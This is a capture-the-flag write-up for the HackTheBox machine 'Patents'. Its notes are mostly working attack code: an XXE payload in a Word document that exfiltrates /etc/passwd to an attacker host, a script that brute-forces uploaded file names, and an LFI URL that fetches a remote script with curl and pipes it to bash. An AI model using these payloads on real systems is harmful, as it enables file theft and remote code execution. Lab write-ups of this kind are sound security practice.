Patents @ HackTheBox

16May

Patents @ HackTheBox

By CTF , , , , , , ,

Patents is a 40-point Linux machine on HackTheBox. For user we exploit an external entity injection in a word document and a local file inclusion that involves path traversal and calculating the name of an uploaded file. For root we use return oriented programming to exploit a stack overflow in a tcp server.

Notes

customXml\item1.xml:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://10.10.14.8:8000/dtd.xml">
%sp;
%param1;
]>
<r>&exfil;</r>

dtd.xml:

<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://10.10.14.8:8000/dtd.xml?%data;'>">

Rce.py:

#!/usr/bin/python3
import hashlib
import datetime
import requests
import time

proxyDict = { 
              "http"  : "127.0.0.1:8081", 
            }

result = requests.get("http://patents.htb")
dateHdr = result.headers['Date']
t = datetime.datetime.strptime(dateHdr, '%a, %d %b %Y %H:%M:%S GMT')
t -= datetime.timedelta(minutes=5)
it = int(t.timestamp())


while True: 
    url = f"http://patents.htb/uploads/{hashlib.sha256(b'xct.php' + str(it).encode('utf-8')).hexdigest()}.docx"
    r = requests.get(url)#, proxies=proxyDict)
    if r.status_code == 200:
        print(it)
        print(url)
    it += 1

LFI:

http://patents.htb/getPatent_alphav1.0.php?id=..././uploads/<id>.docx&cmd=curl%2010.10.14.8:8000/xct.sh%20|%20bash

The Root Exploit.

Reads

Share this post

Author

Related Posts

08May

Vim RCE & OpenBSD Binary Exploitation – Attended @ HackTheBox

We will solve Attended, a 50-point machine on HackTheBox. For user, we will be sending some emails back and forth... read more

25Sep

SEH Based Buffer Overflow with Space Limitations – Kevin @ PG Practice

We are solving Kevin, an easy-rated Windows machine on PG Practice that involves a SEH Based Buffer Overflow. read more

13Mar

Reel2 @ HackTheBox

Solving Reel2 on HackTheBox. This is a 40 point box involving Spraying, Phishing, Sticky Notes and JEA. read more

27Nov

Password Spraying, gMSA, ADIDNS & Constrained Delegation – Intelligence @ HackTheBox

We are solving intelligence, a nice windows machine on HackTheBox, created by Micah. For user, we will enumerate pdfs on... read more

31Jul

JWT & Docker CVE – TheNotebook @ HackTheBox

We are solving TheNotebook, a 30-point Machine on HackTheBox where we'll modify a JWT Token, upload a PHP-Webshell and use... read more

15Jan

XSS, Tab Nabbing & Rust Reversing – Developer @ HackTheBox

We are going to solve Developer, a pretty hard Linux machine on HackTheBox. It involves Cross-Site-Scripting, Tab Nabbing & reversing... read more

17Aug

Heist @ HackTheBox

Heist is an "easy" machine on hackthebox, involving some enumeration (especially rpc) and some forensics (dumping firefox memory). read more

09Oct

SSRF into Responder, gMSA Password & SeRestorePrivilege – Heist @ PG Practice

We are solving Heist from PG Practice. Heist is a really cool Windows machine that involves stealing a hash, reading... read more

28Mar

Passage @ HackTheBox

Solving Passage on HackTheBox. This is an easy box involving 2 public exploits, one for the CuteNews CMS and one... read more

18Jan

Player @ HackTheBox

Player is a hard box, that we solved in unintended ways that are partly patched now. read more